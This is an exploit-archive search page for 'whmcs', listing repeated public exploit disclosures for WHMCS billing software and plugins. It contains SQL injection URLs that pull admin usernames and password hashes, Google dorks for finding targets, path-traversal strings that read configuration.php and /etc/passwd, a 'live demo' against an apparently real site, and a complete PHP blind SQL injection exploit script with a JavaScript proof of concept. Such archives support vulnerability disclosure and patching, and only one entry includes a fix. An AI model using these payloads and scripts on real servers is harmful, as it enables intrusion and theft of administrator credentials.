whmcs
Search result for 'whmcs'
(0.0114300251007 seconds)
Islam DefenDers/WHMCS Control SQL Injection ( na)
#=Info=======================================================================# # Software: WHMCS control (WHMCompleteSolution) Sql Injection # # # # Vulnerability: Remote Sql Injection # # Google Dork: Powered by WHMCompleteSolution - or " inurl:WHMCS # # Off. site: www.MiXaTy.com # #============================================================================# #=Author==============================================# # Author: Islam DefenDers # # Date: 24.04.2010 # # Contact: email: hackereg@hotmail.com # #====================================================# #=Sql Injection===========================================================================================================================================================# # Exploit: http://site/submitticket.php?step=2&deptid=001' and 1=0 union all select 1,2,3,4,message,6,7,8,9,10 from tbltickets--%20 # DOWNLOAD : http://www.whmcs.com/ # Live demo: http://ste/support/submitticket.php?step=2&deptid=001' and 1=0 union all select 1,2,3,4,username,6,7,8,password,10 from tbladmins--%20 #=========================================================================================================================================================================# #=Greetz==================================# # IsLam DefenDers Mr.HaMaDa # #=======================================# HaMaDa SCoOoRPioN - DR.B@HY - MiXaTy TeaM - Islam DefenDers TeaM site: www.mixaty.com E: hackereg@hotmail.com _________________________________________________________________ Hotmail: Trusted email with Microsoft’s powerful SPAM protection. https://signup.live.com/signup.aspx?id=60969
WHMCS Control suffers from a remote SQL injection vulnerability.
Julian A. Rodriguez/whmcs-disclose.txt ( na)
Software: WHMCS V3.7.1 Complete Name: WHM Complete Solution Version 3.7.1 Bug: Information Disclosure Website of the Software: http://www.whmcs.com/ Author: Julian A. Rodriguez Contact: julianrdz91@gmail.com Review: An attacker can obtain very sensible information about the server just typing the next path : /status/index.php?action=phpinfo You can enter to this folder/file without any kind of security test or some authorization. You can get information about the versions of the software, the kernel version, the operating system, the commands that you can use inside the server, you can see if the safe mode of the server is on/off, you can grab information about the server administrator too, the path of the server root, and a lot of more information about the server. Proof of Concept: http://www.xxxxxxxx.net/status/index.php?action=phpinfo Note: In the demo of the site whmcs.com you can't enter to this section because the files have been deleted for security reasons. -- Julian A. Rodriguez Website: http://www.nulledcore.com
WHM Complete Solution (WHMCS) version 3.7.1 suffers from an information disclosure vulnerability.
Islam DefenDers/WHMCS Control 2 SQL Injection ( na)
Software: WHMCS control 2 Sql Injection Vulnerability: Remote Sql Injection Google Dork: Powered by WHMCompleteSolution - or " inurl:WHMCS or' announcements.php Off. site: www.MiXaTy.com Author Author: Islam DefenDers Date: 2.5.2010 Contact: email: hackereg@hotmail.com Sql Injection Exploit: http://site/announcements.php?id=1' and 1=0 union all select 1,2,concat(email,0x3d,password),username,5 from tbladmins-- DOWNLOAD : http://www.whmcs.com/ Live demo: http://www.jsr-host.com/announcements.php?id=1%27%20and%201=0%20union%20all%20select%201,2,concat%28email,0x3d,password%29,username,5%20from%20tbladmins-- Greetz IsLam DefenDers Mr.HaMaDa HaMaDa SCoOoRPioN site: www.mixaty.com E: hackereg@hotmail.com _________________________________________________________________ Your E-mail and More On-the-Go. Get Windows Live Hotmail Free. https://signup.live.com/signup.aspx?id=60969
WHMCS Control version 2 suffers from a remote SQL injection vulnerability.
Islam DefenDers/WHMCS control (WHMCompleteSolution) Sql Injection ( php)
#=Info=======================================================================# # Software: WHMCS control (WHMCompleteSolution) Sql Injection # # # # Vulnerability: Remote Sql Injection # # Google Dork: Powered by WHMCompleteSolution - or " inurl:WHMCS # # Off. site: www.MiXaTy.com # #============================================================================# #=Author==============================================# # Author: Islam DefenDers # # Date: 24.04.2010 # # Contact: email: hackereg@hotmail.com # #====================================================# #=Sql Injection===========================================================================================================================================================# # Exploit: http://site/submitticket.php?step=2&deptid=001' and 1=0 union all select 1,2,3,4,message,6,7,8,9,10 from tbltickets--%20 # DOWNLOAD : http://www.whmcs.com/ # Live demo: http://ste/support/submitticket.php?step=2&deptid=001' and 1=0 union all select 1,2,3,4,username,6,7,8,password,10 from tbladmins--%20 #=========================================================================================================================================================================# #=Greetz==================================# # IsLam DefenDers Mr.HaMaDa # #=======================================# HaMaDa SCoOoRPioN - DR.B@HY - MiXaTy TeaM - Islam DefenDers TeaM site: www.mixaty.com E: hackereg@hotmail.com
R teen/WHMCS (cart.php) Local File Disclosure ( php)
#Exploit Title : WHMCS (cart.php) Local File Disclosure
#Author : R-t33n
#Product : WHMCS
#Vendor : http://whmcs.com/
#Version : 4.x.x
#Date : 28/12/2011
#Category : Remote , webapps
#Google Dork : use ur mind kid.
#Tested on : windows 2003 , Linux , ubuntu.
#Homepage : http://alb0zz.com/
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
http://127.0.0.1/ [ PATH ] /cart.php?a=[wrong value]&templatefile=[File]%00
http://127.0.0.1/ [ PATH ] /cart.php?a=alb0zz&templatefile=../../../configuration.php%00
see into the [html] source code for the file disclosure.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
____ _ ____ ____ _ _ _ _ _
| _ \ _ __ ___ _ _ __| | |___ \| __ ) / \ | | |__ __ _ _ __ (_) __ _ _ __ | |
| |_) | '__/ _ \| | | |/ _` | __) | _ \ / _ \ | | '_ \ / _` | '_ \| |/ _` | '_ \ | |
| __/| | | (_) | |_| | (_| | / __/| |_) | / ___ \| | |_) | (_| | | | | | (_| | | | | |_|
|_| |_| \___/ \__,_|\__,_| |_____|____/ /_/ \_\_|_.__/ \__,_|_| |_|_|\__,_|_| |_| (_)
#~ Greetz: Red Drag0n_al , Ace Wizard, 0x0 , dA3m0n , The Game , Bl4zE , Autorun , b4ti , Eragon_Al
#./ http://alb0zz.com
red virus/WHMCS 3.x Local File Disclosure ( na)
# Title : WHMCS (clientarea.php) Local File Disclosure # Author : Red Virus >>>c3o@w.cn # Product : WHMCS ( WHMCompleteSolution ) # Vendor : http://whmcs.com/ # Date : 11/04/2011 # Version : 3.X.x # Tested on : linux+apache # Homepage : www.alm3refh.com ================================================================ http://localhost/[PATH]/clientarea.php?action=[wrong_value]&templatefile=[LFD]%00 http://localhost/[PATH]/clientarea.php?action=red&templatefile=../../configuration.php%00 show the page source to see Disclosure file ================================================================ Greetz To . >>> alm3refh.com - tryag.cc - joood T3rr0rist & cyb3r-1st & i-Hmx & h311 c0d3 infofst & virus hima & Karar aLShaMi & all alm3refh group ahwak2000 & reno & amr2006 & b0x & ZombiE_KsA
WHMCS version 3.x.x suffers from a local file disclosure vulnerability.
HJauditing Employee Tim/WHMCS Grouppay 1.5 SQL Injection ( na)
#######################################################################
Tile: WHMCS grouppay plugin SQL Injection <= 1.5
Author: HJauditing Employee Tim
E-mail: Tim@HJauditing.com
Web: http://hjauditing.com/
Plugin: http://kadeo.com.au/design-and-development/whmcs-dev/whmcs-modules/72-group-pay.html
#######################################################################
============
Introduction
============
We have found a SQL injection inside the group pay plugin for WHCMS.
A lot of game hosting companies are using this plugin.
SQL Injection is in the function gp_LoadUserFromHash.
============
Exploits
============
- SQL Injection
grouppay.php?hash=%hash%' and '1'='1
============
Code SQL Injection
============
/modules/addons/group_pay/functions_hash.php
function gp_LoadUserFromHash($hash) {
//Kill the Dashes
$hash = str_replace ( "-", "", $hash );
$result = mysql_query ( "SELECT `id` from tblclients where md5(CONCAT(id,email)) = '$hash'" );
if($result){
$row = mysql_fetch_row ( $result );
return $row [0];
}else{
return false;
}
}
============
Fix
============
/modules/addons/group_pay/functions_hash.php
function gp_LoadUserFromHash($hash) {
//Kill the Dashes
$hash = str_replace ( "-", "", $hash );
$hash = mysql_real_escape_string($hash);
$result = mysql_query ( "SELECT `id` from tblclients where md5(CONCAT(id,email)) = '$hash'" );
if($result){
$row = mysql_fetch_row ( $result );
return $row [0];
}else{
return false;
}
}
#######################################################################
WHMCS Grouppay plugin versions 1.5 and below suffer from a remote SQL injection vulnerability.
Ahmed Aboul-Ela/WHMCS 4.5.2 SQL Injection ( na)
# Title: WHMCS 4.x SQL Injection Vulnerability
# Google Dork: intext:"Powered by WHMCompleteSolution" OR inurl:"submitticket.php"
# Author: Ahmed Aboul-Ela
# Contact: Ahmed.Aboul3la[at]gmail[dot]com
# Date: 14/5/2013
# Vendor: http://www.whmcs.com
# Version: 4.5.2 and perior versions should be affected too
# Tested on: Linux
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Sql Injection Vulnerability in "/includes/invoicefunctions.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- Vulnerable Code Snippet :
LINE 582: function pdfInvoice($id)
LINE 583: {
LINE 686: if ($CONFIG['GroupSimilarLineItems'])
LINE 687: {
LINE 688: $result = full_query('' . 'SELECT COUNT(*),id,type,relid,description,amount,taxed FROM tblinvoiceitems WHERE invoiceid=' . $id . ' GROUP BY `description`,`amount` ORDER BY id ASC');
LINE 689: }
As we can see here the $id argument of pdfInvoice function have been used directly at mysql query without any sanitization which leads directly to Sql Injection
It appears that pdfInvoice function is being called at "/dl.php" file as the following:
LINE 21: if ($type == 'i')
LINE 22: {
LINE 23: $result = select_query('tblinvoices', '', array(
LINE 24: 'id' => $id
LINE 25: ));
LINE 26: $data = mysql_fetch_array($result);
LINE 27: $invoiceid = $data['id'];
LINE 28: $invoicenum = $data['invoicenum'];
LINE 29: $userid = $data['userid'];
LINE 30: if ((!$_SESSION['adminid'] && $_SESSION['uid'] != $userid))
LINE 31: {
LINE 32: downloadLogin();
LINE 33: }
LINE 34: if (!$invoicenum)
LINE 35: {
LINE 36: $invoicenum = $invoiceid;
LINE 37: }
LINE 38: require('includes/clientfunctions.php');
LINE 39: require('includes/countries.php');
LINE 40: require('includes/invoicefunctions.php');
LINE 41: require('includes/tcpdf.php');
LINE 42: $pdfdata = pdfInvoice($id);
LINE 43: header('Pragma: public');
LINE 44: header('Expires: Mon, 26 Jul 1997 05:00:00 GMT');
LINE 45: header('Last-Modified: ' . gmdate('D, d M Y H:i:s') . ' GMT');
LINE 46: header('Cache-Control: must-revalidate, post-check=0, pre-check=0, private');
LINE 47: header('Cache-Control: private', false);
LINE 48: header('Content-Type: application/octet-stream');
LINE 49: header('Content-Disposition: attachment; filename="' . $invoicenum . '.pdf"');
LINE 50: header('Content-Transfer-Encoding: binary');
LINE 51: echo $pdfdata;
LINE 52: exit();
LINE 53: return 1;
LINE 54: }
As we can see at LINE "42" the pdfInvoice function have been called and passed $id Variable without any sanitization
Afterwards it force the browser to download the generated invoice in PDF format
- Proof of Concept for Exploitation
To Dump Administrator Credentials (user & pass):
http://www.site.com/whmcs/dl.php?type=i&id=1 and 0x0=0x1 union select 1,2,3,4,CONCAT(username,0x3a3a3a,password),6,7 from tbladmins --
~ Result: The Browser will prompt download for the pdf invoice file after opening it you should find the username and pw hash there :)
- Precondition to Successfully Exploit the Vulnerability:
"Group Similar Line Items" Option should be Enabled at the Invoices Settings in the WHMCS Admin ( It should be Enabled by default )
- Credits:
Ahmed Aboul-Ela - Information Security Consultant @ Starware Group
WHMCS version 4.5.2 suffers from a remote SQL injection vulnerability.
Islam DefenDers/WHMCS Control 2 (announcements.php) SQL Injection ( php)
Software: WHMCS control 2 Sql Injection
Vulnerability: Remote Sql Injection
Google Dork: Powered by WHMCompleteSolution - or " inurl:WHMCS or' announcements.php
Off. site: www.MiXaTy.com
Author
Author: Islam DefenDers
Date: 2.5.2010
Contact: email: hackereg@hotmail.com
Sql Injection
Exploit: http://site/announcements.php?id=1' and 1=0 union all select 1,2,concat(email,0x3d,password),username,5 from tbladmins--
DOWNLOAD : http://www.whmcs.com/
Greetz
IsLam DefenDers Mr.HaMaDa
HaMaDa SCoOoRPioN
site: www.mixaty.com
E: hackereg@hotmail.com
Starware Security Team/WHMCS 4.5.2 Blind SQL Injection ( na)
____ _
/ ___|| |_ __ _ _ __ __ ____ _ _ __ ___
\___ \| __/ _` | '__| \ \ /\ / / _` | '__/ _ \
___) | || (_| | | \ V V / (_| | | | __/
|____/ \__\__,_|_| \_/\_/ \__,_|_| \___|
# Software : WHMCS (WHMCompleteSolution)
# Google Dork: Turn on thinking mode :P
# Date: 10/22/2012
# Author: Starware Security Team [www.Resecure.me]
# Contact Us : Security[@]star-ware.com
# Vendor Homepage: http://www.whmcs.com
# Tested on: WHMCS v4.5.2
# Affected versions: 4.5.x
-----------------------------------------------------
#Vulnerability Exists in : [SCRIPT_DIR]/modules/gateways/callback/googlecheckout.php
#Vulnerable Source Code Snippet :
LINE 11: $xml_response = (isset($HTTP_RAW_POST_DATA) ? $HTTP_RAW_POST_DATA : file_get_contents('php://input'));
LINE 16: $xmldata = XMLtoArray($xml_response);
LINE 19: $ordernumber = $xmldata['CHARGE-AMOUNT-NOTIFICATION']['GOOGLE-ORDER-NUMBER'];
LINE 22: $query = 'SELECT data FROM tblgatewaylog WHERE gateway=\'Google Checkout\' AND data LIKE \'%new-order-notification%' . $ordernumber . '%\'';
#Proof of Concept :
<html>
<head>
<title>WHMCS Blind SQL Injection POC</title>
</head>
<body>
<script>
var params = "<charge-amount-notification><google-order-number>0' %YOUR INJECTION HERE% -- -</google-order-number><new-fulfillment-order-state>charge-amount-notification</new-fulfillment-order-state></charge-amount-notification>";
var http = new XMLHttpRequest();
try {
netscape.security.PrivilegeManager.enablePrivilege("UniversalBrowserRead");
} catch (e) {
alert("Permission UniversalBrowserRead denied.");
}
http.open("POST", "http://site.com/whmcs/modules/gateways/callback/googlecheckout.php", true);
http.onreadystatechange = handleResponse;
http.send(params);
function handleResponse() {
if(http.readyState == 4 && http.status == 200){
var response = http.responseText;
alert(response);
}
}
</script>
</body>
</html>
#Exploit Code :
<?php
/*
WHMCS Blind SQL Injection Exploit by Starware Security Team.
Usage: php exploit.php URL seconds
*/
set_time_limit(0);
function post_request($url,$post_data,$follow=0) {
$user_agent = 'Mozilla/5.0 (X11; Linux i686; rv:7.0.1) Gecko/20100101 Firefox/7.0.1';
$ch = curl_init();
$timeout = 1;
$execution_timeout = 4;
curl_setopt($ch, CURLOPT_URL,$url);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
if($follow == 1) curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE );
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
curl_setopt($ch, CURLOPT_HTTPHEADER,array('Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8','Accept-Language: en-us,en;q=0.5','Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7','Keep-Alive: 115','Connection: keep-alive'));
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_TIMEOUT, $execution_timeout);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,$post_data);
$response = curl_exec($ch);
curl_close($ch);
return $response;
}
function start_time() {
$time = microtime();
$time = explode(" ", $time);
$time = $time[1] + $time[0];
return $time;
}
function end_time($start) {
$time = microtime();
$time = explode(" ", $time);
$time = $time[1] + $time[0];
$finish = $time;
$totaltime = ($finish - $start);
return round($totaltime);
}
function check_ascii($num,$num2,$num3) {
global $url,$seconds;
$start= start_time();
$injection = "/**/AnD/**/if(ascii(substring((SeLEcT/**/password/**/FROM/**/tbladmins/**/whEre/**/id/**/=/**/1),$num3,1))/**/BETWEEN/**/$num/**/and/**/$num2,/**/BENCHMARK(999999,MD5(NOW()*NOW())),/**/0)/**/-- #";
post_request($url,"<charge-amount-notification><google-order-number>0' $injection </google-order-number><new-fulfillment-order-state>charge-amount-notification</new-fulfillment-order-state></charge-amount-notification>");
if(end_time($start) >= $seconds) return true; else return false;
}
function inject($num,$num2,$num3) {
global $url,$seconds;
for($i=$num;$i<=$num2;$i++) {
$start= start_time();
$injection = "/**/AnD/**/if(ascii(substring((SeLEcT/**/password/**/FROM/**/tbladmins/**/whEre/**/id/**/=/**/1),$num3,1))/**/=/**/$i,/**/BENCHMARK(999999,MD5(NOW()*NOW())),/**/0)/**/-- #";
post_request($url,"<charge-amount-notification><google-order-number>0' $injection </google-order-number><new-fulfillment-order-state>charge-amount-notification</new-fulfillment-order-state></charge-amount-notification>");
if(end_time($start) >= $seconds) { echo chr($i); flush(); }
}
}
function get_password() {
global $url;
for($i=1; $i<=32;$i++) {
if(check_ascii(48,52,$i)) { inject(48,52,$i); }
elseif(check_ascii(53,57,$i)) { inject(53,57,$i); }
elseif(check_ascii(97,101,$i)) { inject(97,101,$i); }
elseif(check_ascii(102,106,$i)) { inject(102,106,$i); }
elseif(check_ascii(107,111,$i)) { inject(107,111,$i); }
elseif(check_ascii(112,116,$i)) { inject(112,116,$i); }
elseif(check_ascii(116,122,$i)) { inject(116,122,$i); }
}
}
if ($argc < 3) {
print "Usage: php ".$argv[0]." URL seconds\r\nExample:\r\nphp ".$argv[0]." http://site.com/whmcs/ 1\r\n-----------------------------------------\r\n";
die;
}
$url = trim($argv[1])."/modules/gateways/callback/googlecheckout.php";
$seconds = trim($argv[2]);
echo "[~] Fetching password right now ... \n"; flush();
echo " >> MD5 Password = "; flush();
get_password();
?>
#################################################################################
Note: to exploit this vulnerability the google checkout payment gateway
should be activated by admin from the whmcs admin panel
~ END OF Disclosure ~
Good Luck :)
#################################################################################
# Starware is an company specialzed in Hosting and Information Security field #
# with list of high ranked sites including Mobile operators used our Hosting #
# and Security Services. #
# #
# "Company Located in Egypt" #
# #
# http://www.star-ware.com #
# #
#################################################################################
WHMCS version 4.5.2 remote blind SQL injection exploit.
AntiSecurity/Joomla J!WHMCS Integrator Local File Inclusion ( na)
============================================================================================================
[o] Joomla Component J!WHMCS Integrator Local File Inclusion Vulnerability
Software : com_jwhmcs version 1.5.0
Vendor : https://client.gohigheris.com/
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[dot]antisecurity[dot]org
Home : http://antisecurity.org/
============================================================================================================
[o] Exploit
http://localhost/[path]/index.php?option=com_jwhmcs&controller=[LFI]
[o] PoC
http://localhost/index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00
============================================================================================================
[o] Greetz
Angela Zhang stardustmemory aJe martfella pizzyroot Genex
H312Y yooogy mousekill }^-^{ noname matthews s4va wishnusakti
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke
============================================================================================================
[o] April 06 2010 - GMT +07:00 Jakarta, Indonesia
The Joomla J!WHMCS Integrator component version 1.5.0 suffers from a local file inclusion vulnerability.
red virus/WHMCS 3.x.x (clientarea.php) Local File Disclosure ( php)
# Title : WHMCS (clientarea.php) Local File Disclosure # Author : Red Virus >>>c3o@w.cn # Product : WHMCS ( WHMCompleteSolution ) # Vendor : http://whmcs.com/ # Date : 11/04/2011 # Version : 3.X.x # Tested on : linux+apache # Homepage : www.alm3refh.com ================================================================ http://localhost/[PATH]/clientarea.php?action=[wrong_value]&templatefile=[LFD]%00 http://localhost/[PATH]/clientarea.php?action=red&templatefile=../../configuration.php%00 show the page source to see Disclosure file ================================================================ Greetz To . >>> alm3refh.com - tryag.cc - joood T3rr0rist & cyb3r-1st & i-Hmx & h311 c0d3 infofst & virus hima & Karar aLShaMi & all alm3refh group ahwak2000 & reno & amr2006 & b0x & ZombiE_KsA
Ahmed Aboul-Ela/WHMCS 4.x (invoicefunctions.php, id param) - SQL Injection Vulnerability ( php)
# Title: WHMCS 4.x SQL Injection Vulnerability
# Google Dork: intext:"Powered by WHMCompleteSolution" OR inurl:"submitticket.php"
# Author: Ahmed Aboul-Ela
# Contact: Ahmed.Aboul3la[at]gmail[dot]com
# Date: 14/5/2013
# Vendor: http://www.whmcs.com
# Version: 4.5.2 and perior versions should be affected too
# Tested on: Linux
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Sql Injection Vulnerability in "/includes/invoicefunctions.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- Vulnerable Code Snippet :
LINE 582: function pdfInvoice($id)
LINE 583: {
LINE 686: if ($CONFIG['GroupSimilarLineItems'])
LINE 687: {
LINE 688: $result = full_query('' . 'SELECT COUNT(*),id,type,relid,description,amount,taxed FROM tblinvoiceitems WHERE invoiceid=' . $id . ' GROUP BY `description`,`amount` ORDER BY id ASC');
LINE 689: }
As we can see here the $id argument of pdfInvoice function have been used directly at mysql query without any sanitization which leads directly to Sql Injection
It appears that pdfInvoice function is being called at "/dl.php" file as the following:
LINE 21: if ($type == 'i')
LINE 22: {
LINE 23: $result = select_query('tblinvoices', '', array(
LINE 24: 'id' => $id
LINE 25: ));
LINE 26: $data = mysql_fetch_array($result);
LINE 27: $invoiceid = $data['id'];
LINE 28: $invoicenum = $data['invoicenum'];
LINE 29: $userid = $data['userid'];
LINE 30: if ((!$_SESSION['adminid'] && $_SESSION['uid'] != $userid))
LINE 31: {
LINE 32: downloadLogin();
LINE 33: }
LINE 34: if (!$invoicenum)
LINE 35: {
LINE 36: $invoicenum = $invoiceid;
LINE 37: }
LINE 38: require('includes/clientfunctions.php');
LINE 39: require('includes/countries.php');
LINE 40: require('includes/invoicefunctions.php');
LINE 41: require('includes/tcpdf.php');
LINE 42: $pdfdata = pdfInvoice($id);
LINE 43: header('Pragma: public');
LINE 44: header('Expires: Mon, 26 Jul 1997 05:00:00 GMT');
LINE 45: header('Last-Modified: ' . gmdate('D, d M Y H:i:s') . ' GMT');
LINE 46: header('Cache-Control: must-revalidate, post-check=0, pre-check=0, private');
LINE 47: header('Cache-Control: private', false);
LINE 48: header('Content-Type: application/octet-stream');
LINE 49: header('Content-Disposition: attachment; filename="' . $invoicenum . '.pdf"');
LINE 50: header('Content-Transfer-Encoding: binary');
LINE 51: echo $pdfdata;
LINE 52: exit();
LINE 53: return 1;
LINE 54: }
As we can see at LINE "42" the pdfInvoice function have been called and passed $id Variable without any sanitization
Afterwards it force the browser to download the generated invoice in PDF format
- Proof of Concept for Exploitation
To Dump Administrator Credentials (user & pass):
http://www.site.com/whmcs/dl.php?type=i&id=1 and 0x0=0x1 union select 1,2,3,4,CONCAT(username,0x3a3a3a,password),6,7 from tbladmins --
~ Result: The Browser will prompt download for the pdf invoice file after opening it you should find the username and pw hash there :)
- Precondition to Successfully Exploit the Vulnerability:
"Group Similar Line Items" Option should be Enabled at the Invoices Settings in the WHMCS Admin ( It should be Enabled by default )
- Credits:
Ahmed Aboul-Ela - Information Security Consultant @ Starware Group
HJauditing Employ./WHMCS Group Pay Plugin 1.5 (grouppay.php, hash param) - SQL Injection ( php)
#######################################################################
Tile: WHMCS grouppay plugin SQL Injection <= 1.5
Author: HJauditing Employee Tim
E-mail: Tim@HJauditing.com
Web: http://hjauditing.com/
Plugin: http://kadeo.com.au/design-and-development/whmcs-dev/whmcs-modules/72-group-pay.html
#######################################################################
============
Introduction
============
We have found a SQL injection inside the group pay plugin for WHCMS.
A lot of game hosting companies are using this plugin.
SQL Injection is in the function gp_LoadUserFromHash.
============
Exploits
============
- SQL Injection
grouppay.php?hash=%hash%' and '1'='1
============
Code SQL Injection
============
/modules/addons/group_pay/functions_hash.php
function gp_LoadUserFromHash($hash) {
//Kill the Dashes
$hash = str_replace ( "-", "", $hash );
$result = mysql_query ( "SELECT `id` from tblclients where md5(CONCAT(id,email)) = '$hash'" );
if($result){
$row = mysql_fetch_row ( $result );
return $row [0];
}else{
return false;
}
}
============
Fix
============
/modules/addons/group_pay/functions_hash.php
function gp_LoadUserFromHash($hash) {
//Kill the Dashes
$hash = str_replace ( "-", "", $hash );
$hash = mysql_real_escape_string($hash);
$result = mysql_query ( "SELECT `id` from tblclients where md5(CONCAT(id,email)) = '$hash'" );
if($result){
$row = mysql_fetch_row ( $result );
return $row [0];
}else{
return false;
}
}
#######################################################################
AntiSecurity/Joomla Component J!WHMCS Integrator com_jwhmcs Local File Inclusion Vulnerability ( php)
============================================================================================================
[o] Joomla Component J!WHMCS Integrator Local File Inclusion Vulnerability
Software : com_jwhmcs version 1.5.0
Vendor : https://client.gohigheris.com/
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[dot]antisecurity[dot]org
Home : http://antisecurity.org/
============================================================================================================
[o] Exploit
http://localhost/[path]/index.php?option=com_jwhmcs&controller=[LFI]
[o] PoC
http://localhost/index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00
============================================================================================================
[o] Greetz
Angela Zhang stardustmemory aJe martfella pizzyroot Genex
H312Y yooogy mousekill }^-^{ noname matthews s4va wishnusakti
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke
============================================================================================================
[o] April 06 2010 - GMT +07:00 Jakarta, Indonesia